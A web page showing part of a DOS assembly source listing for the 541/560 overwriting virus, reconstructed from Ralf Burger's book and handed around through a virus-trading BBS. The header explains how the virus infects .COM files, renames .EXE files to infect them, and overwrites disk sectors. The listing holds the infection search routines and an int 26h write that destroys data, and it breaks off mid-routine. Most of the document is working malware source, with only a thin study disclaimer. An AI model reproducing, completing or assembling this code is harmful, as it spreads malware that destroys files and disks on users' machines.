📄 560.asm
字号:
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
PAGE 70,120
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 Name Virus: 541-Virus 14 Sept 1990 圹
;;圹 Suggested Alias: NOP-Virus 圹
;;圹 Variant: 537-Virus, 560-Virus 圹
;;圹 圹
;;圹 Last Reported: September 1990 圹
;;圹 'Isolated': The Hague, The Netherlands 圹
;;圹 by: Righard Zwienenberg 2:512/2.3@fidonet 圹
;;圹 圹
;;圹 Author: Ralf Burger in 1986 for his book: 圹
;;圹 VIRUSES, A HIGH TECHNICAL DISEASE 圹
;;圹 圹
;;圹 圹
;;圹 The code of this virus was built into a MOVE-util. It was imple- 圹
;;圹 mented wrong. The virus went straight to the destruction code. 圹
;;圹 I've taken the code out and reconstructed it to its original 圹
;;圹 form. Because I had a listing of Ralf Burger's book I have placed 圹
;;圹 his own comments behind the code, although I've translated it into 圹
;;圹 English. The labels used, are also his. 圹
;;圹 圹
;;圹 I've put three comments myself in the code. These can be recog- 圹
;;圹 nized by the starting ;; of it. 圹
;;圹 圹
;;圹 Edwin Cleton, the one who send me the MOVE util for examination 圹
;;圹 downloaded it from a BBS. So far there are no damage reports. 圹
;;圹 The move-util checked the system's date. If the date is 1 Aug 圹
;;圹 or later of any year, the virus was called. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 This sourcelisting can be recompiled with MASM 4.0+ and A86. For 圹
;;圹 compilation with A86 you must specify 'conta' and 'disks' as a word 圹
;;圹 else the definition will conflict with what A86 previously thinks. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 Virus-Description: 圹
;;圹 ------------------ 圹
;;圹 圹
;;圹 The virus infects the first COM-file in the ROOT-Directory. The 圹
;;圹 virus overwrites the first 230h bytes of the file. When an infected 圹
;;圹 file is executed it will infect one other .COM-file. The system will 圹
;;圹 crash mostly afterwards because the overwritten part is not stored. 圹
;;圹 When COMMAND.COM is infected on the HDU, the system will not reboot 圹
;;圹 because COMMAND.COM is complete. Each reboot COMMAND.COM will infect 圹
;;圹 one other .COM-File and the computer crashes. When all .COM-files 圹
;;圹 are infected, .EXE-files will be renamed (FCB) to .COM to become 圹
;;圹 infected. When all .COM and .EXE-files are infected, the virus will 圹
;;圹 write to sectors on disk depending on the system's time. 圹
;;圹 The infected files are lost en must be replaced by backup-copies. 圹
;;圹 圹
;;圹 The shortest size an infected file can be is 230h bytes. The code is 圹
;;圹 shorter, but this is the value which has been put into the code as 圹
;;圹 the virus-length. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
Code Segment
Assume CS:Code
progr equ 100h
org progr
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; The three NOP's are set as a identifier for the virus. This way
; the virus knows this copy is already infected.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
MAIN:
nop
nop
nop
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Init the Pointers
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov ax,0
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Get actual diskdrive
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov ah,19h ; drive?
int 21h
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Get actual path
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov dh,0
add al,1
mov dl,al ; in actual drive?
lea si,cs:old_path
int 21h
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Get actual number of present diskdrives.If only one diskdrive is present,
; the pointer for 'search_order' will transfered to 'search_order + 6'
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov ah,0Eh ; how many disks
mov dl,0
int 21h
mov al,1
cmp al,1 ; one drive?
jne hups3
mov al,6
hups3:
mov ah,0
lea bx,cs:search_order
add bx,ax
add bx,1
mov cs:pointer,bx
clc
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; The carry-flag is set if the search will find no more .COM-files. To do
; it the easy way, all .EXE-files will get the .COM-extention to become
; infected. This will result in an error if the executed .EXE is to big.
; The error-message 'Program too big to fit in memory' will be the result.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
change_disk:
jnc no_name_change
mov ah,17h ; change exe to com
lea dx,cs:mask_exe
int 21h
cmp al,0FFh
jnz no_name_change ; .EXE found?
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; When no .COM or .EXE-files are found, sectors will be overwritten,
; depending from the system's time in the msec-range. This is the moment
; that the entire disk is infected. 'VIRUS' can not infect any more and
; starts the destruction.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov ah,2Ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; Write shit on disk
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Test if the end of the seek-procedure or of the table has been reached.
; If so: end.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0FFh
jnz hups2
jmp hops
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Get new disk from the list with search orders and make it the actual one.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
hups2:
mov ah,0Eh
int 21h ; change disk
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Start at the ROOT-Directory.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
mov ah,3Bh ; change path
lea dx,cs:path
int 21h
jmp find_first_file
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Starting from the ROOT-dir, search for the first sub-dir. Previous change
; all .EXE-files into .COM-files in the old directory.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:mask_exe
int 21h
mov ah,3Bh ; use root dir
lea dx,cs:path
int 21h
mov ah,4Eh ; search for first subdir
mov cx,11h ; dir mask
lea dx,cs:mask_dir
int 21h
jc change_disk
mov bx,cs:counter
inc bx
dec bx
jz use_next_subdir
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -